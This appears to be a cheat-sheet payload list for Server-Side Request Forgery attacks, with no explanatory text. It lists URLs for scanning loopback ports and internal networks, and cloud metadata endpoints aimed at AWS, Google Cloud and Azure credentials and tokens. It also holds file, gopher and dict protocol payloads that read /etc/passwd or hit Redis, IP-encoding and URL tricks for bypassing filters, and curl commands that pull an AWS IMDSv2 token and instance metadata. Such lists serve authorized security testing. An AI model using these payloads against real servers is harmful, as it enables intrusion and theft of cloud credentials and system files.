# SSRF (Server-Side Request Forgery) Payloads

# Basic SSRF
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
http://[::]

# Port scanning
http://127.0.0.1:22
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:3306
http://127.0.0.1:5432
http://127.0.0.1:6379
http://127.0.0.1:8080
http://127.0.0.1:27017

# Cloud metadata endpoints
# AWS
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/

# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

# Digital Ocean
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id

# Internal network scanning
http://192.168.0.1
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1

# Protocol handlers
file:///etc/passwd
file:///c:/windows/win.ini
dict://127.0.0.1:11211/
gopher://127.0.0.1:6379/_INFO
ldap://127.0.0.1:389
tftp://127.0.0.1:69

# Bypassing filters
# Using decimal IP
http://2130706433 (127.0.0.1)
http://3232235521 (192.168.0.1)

# Using octal IP
http://0177.0.0.1

# Using hex IP
http://0x7f000001
http://0x7f.0x0.0x0.0x1

# DNS rebinding
http://spoofed.burpcollaborator.net

# URL encoding
http://127.0.0.1%23@example.com
http://example.com@127.0.0.1
http://127.0.0.1%00.example.com
http://127.0.0.1%2f%2f@example.com

# IPv6 localhost
http://[::1]
http://[0:0:0:0:0:0:0:1]
http://[0000:0000:0000:0000:0000:0000:0000:0001]

# Redirect-based SSRF
http://redirect.example.com?url=http://127.0.0.1

# AWS IMDSv2 (requires token)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/